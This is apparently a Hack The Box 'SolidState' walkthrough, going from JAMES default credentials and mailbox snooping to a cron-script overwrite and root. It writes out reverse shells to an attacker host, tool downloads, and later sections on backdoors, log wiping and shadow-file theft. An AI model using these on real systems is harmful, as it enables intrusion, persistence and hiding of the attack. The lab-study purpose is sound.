Machine Synopsis#
Key Exploitation Techniques:
- JAMES Remote Administration Tool default credentials exploitation
- Email server user enumeration and password manipulation
- Email content analysis for SSH credential discovery
- Restricted shell bypass via SSH command execution
- Cronjob exploitation through writable script overwrite
Reconnaissance & Enumeration#
Port Discovery#
$ nmap -sC -sV -A -p- 10.10.10.51
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.8 [10.10.14.8]), PIPELINING, ENHANCEDSTATUSCODES
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open rsip?
| fingerprint-strings:
| GenericLines:
| JAMES Remote Administration Tool 2.3.2
| Please enter your login and password
| Login id:
| Password:
| Login failed for
|_ Login id:
Key Services:
- JAMES Mail Server (SMTP, POP3, NNTP)
- JAMES Remote Administration Tool (port 4555)
- Apache web server
Web Application Analysis#
The website shows “Solid State Security” company page with minimal functionality and no obvious attack vectors.
# Directory enumeration yields no significant results
$ gobuster dir -u http://10.10.10.51 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Exploitation#
JAMES Administration Tool Access#
Default Credential Testing#
# Connect to JAMES Remote Administration Tool
$ nc -v 10.10.10.51 4555
(UNKNOWN) [10.10.10.51] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
Success: Default credentials root:root provide administrative access.
User Enumeration and Password Reset#
# List existing mail accounts
HELP
Currently implemented commands:
help display this help
listusers display existing accounts
countusers display the number of existing accounts
adduser [username] [password] add a new user
verify [username] verify if specified user exist
deluser [username] delete existing user
setpassword [username] [password] sets a user's password
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
# Reset all user passwords to 'password'
setpassword james password
Password for james reset
setpassword thomas password
Password for thomas reset
setpassword john password
Password for john reset
setpassword mindy password
Password for mindy reset
setpassword mailadmin password
Password for mailadmin reset
Email Content Analysis#
POP3 Access and Email Retrieval#
# Access john's mailbox
$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS password
+OK Welcome john
LIST
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <john@localhost>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,
Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully,
James
.
QUIT
Credential Discovery in mindy’s Mailbox#
# Access mindy's mailbox
$ telnet 10.10.10.51 110
USER mindy
+OK
PASS password
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <mindy@localhost>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James
.
SSH Credentials: mindy:P@55W0rd1!2@
SSH Access and Restricted Shell Bypass#
Initial SSH Connection#
$ ssh mindy@10.10.10.51
mindy@10.10.10.51's password: P@55W0rd1!2@
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ whoami
-rbash: whoami: command not found
mindy@solidstate:~$ id
-rbash: id: command not found
Restriction: User is in a restricted bash shell (rbash).
Restricted Shell Bypass#
Method 1: SSH Command Execution
# Execute commands directly via SSH
$ ssh mindy@10.10.10.51 -t "bash --noprofile"
mindy@10.10.10.51's password: P@55W0rd1!2@
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
Method 2: Apache James RCE (Alternative)
# Using searchsploit for Apache James exploit
$ searchsploit Apache James Server 2.3.2
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py
# Download and modify exploit
$ searchsploit -m 35513
$ python 35513.py 10.10.10.51
# Setup netcat listener
$ nc -nlvp 1234
# Payload executes when user logs into email
# Triggers reverse shell as mindy
# Reverse shell received
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.51] 48670
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ whoami
mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt
914d0a4ebc177889b5b89a23f556fd75
Privilege Escalation#
System Enumeration#
# Transfer LinPEAS for enumeration
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget 10.10.14.8/linpeas.sh
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x linpeas.sh
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./linpeas.sh
Cronjob Discovery#
# LinPEAS reveals interesting file in /opt
╔══════════╣ Unexpected in /opt (usually empty)
total 16
drwxr-xr-x 3 root root 4096 Aug 22 2017 .
drwxr-xr-x 22 root root 4096 Apr 26 2021 ..
drwxr-xr-x 11 root root 4096 Apr 26 2021 james-2.3.2
-rwxrwxrwx 1 root root 105 Aug 22 2017 tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
Key Finding: /opt/tmp.py is world-writable and appears to be executed periodically.
Process Monitoring#
# Transfer and run pspy for process monitoring
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ wget 10.10.14.8/pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ chmod +x pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ./pspy32
# Process execution observed
2022/05/09 04:03:01 CMD: UID=0 PID=1716 | /bin/sh -c python /opt/tmp.py
2022/05/09 04:03:01 CMD: UID=0 PID=1717 | python /opt/tmp.py
Confirmation: /opt/tmp.py is executed by root via cronjob.
Cronjob Exploitation#
Payload Creation and Deployment#
# Create Python reverse shell payload
$ cat > py_revshell << 'EOF'
import os
os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1'")
EOF
# Host payload
$ python3 -m http.server 80
# Append payload to tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ curl http://10.10.14.8/py_revshell >> tmp.py
# Verify modification
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
import os
os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1'")
Root Shell Acquisition#
# Setup netcat listener
$ nc -nlvp 9999
listening on [any] 9999 ...
# Wait for cronjob execution
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.51] 40852
root@solidstate:~# whoami
root
root@solidstate:~# cat /root/root.txt
b4c9723a28899b1c45db281d99cc87c9
Post-Exploitation Techniques#
Persistence Methods#
SSH Key Persistence#
# Generate SSH key pair
$ ssh-keygen -t rsa -b 4096 -f solidstate_persistence
# Install as root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys
JAMES Mail Server Backdoor#
# Create mail account for persistence
# echo "adduser backdoor password123" | nc 10.10.10.51 4555
# Modify mail templates for code execution
# cat > /root/apps/james/SAR-INF/config.xml << 'EOF'
# [Include malicious mail processing rules]
# EOF
Cron Backdoor Maintenance#
# Create more sophisticated backdoor
# cat > /opt/system_check.py << 'EOF'
#!/usr/bin/env python
import subprocess
import time
import socket
def check_connection():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
s.connect(("10.10.14.8", 4444))
subprocess.call(["/bin/bash", "-i"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
s.close()
except:
pass
check_connection()
EOF
# Add to crontab
# echo "*/10 * * * * /usr/bin/python /opt/system_check.py" >> /etc/crontab
Defense Evasion#
Mail Server Log Cleanup#
# Clear JAMES mail logs
# > /root/apps/james/logs/mailet.log
# > /root/apps/james/logs/james.log
# Clear system mail logs
# > /var/log/mail.log
# > /var/log/mail.err
Process Hiding#
# Modify cronjob execution to be less obvious
# cat > /opt/tmp.py << 'EOF'
#!/usr/bin/env python
import os
import sys
import time
import random
# Original cleanup function
try:
os.system('rm -r /tmp/* ')
except:
pass
# Hidden backdoor with random delay
time.sleep(random.randint(1, 30))
if random.randint(1, 10) == 5: # Execute 10% of the time
os.system("bash -c 'exec bash -i &>/dev/tcp/10.10.14.8/9999 <&1' &")
sys.exit()
EOF
Lateral Movement Preparation#
Email Server Exploitation#
# Enumerate all mail accounts and passwords
# Connect to JAMES admin tool and extract user list
# Access all mailboxes for credential discovery
# Search for additional systems and credentials in emails
Network Discovery#
# Discover email-related infrastructure
# ss -tlnp | grep -E "(25|110|143|993|995)"
# Scan for internal mail servers
# for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "64 bytes" | cut -d" " -f4 | tr -d ":"; done
Credential Harvesting#
# Extract mail database if present
# find /root/apps/james -name "*.db" -exec cp {} /tmp/ \;
# Search mail content for credentials
# grep -r "password\|pass\|credential" /root/apps/james/var/mail/
# Extract shadow file
# cp /etc/shadow /tmp/shadow.backup
Alternative Exploitation Methods#
Direct JAMES Exploitation#
# Alternative Apache James RCE exploit
$ python 35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
# Trigger by SSH login as any user
$ ssh mindy@10.10.10.51
SMTP Enumeration#
# SMTP user enumeration
$ smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.10.10.51
# SMTP relay testing
$ swaks --to test@10.10.10.51 --from test@attacker.com --server 10.10.10.51
Alternative Privilege Escalation#
Kernel Exploitation#
# Check kernel version
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ uname -a
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686 GNU/Linux
# Search for applicable exploits
$ searchsploit linux kernel 4.9 | grep -i privilege
SUID Binary Analysis#
# Find SUID binaries
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ find / -perm -4000 -type f 2>/dev/null
# Check for custom SUID binaries
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -la /usr/local/bin/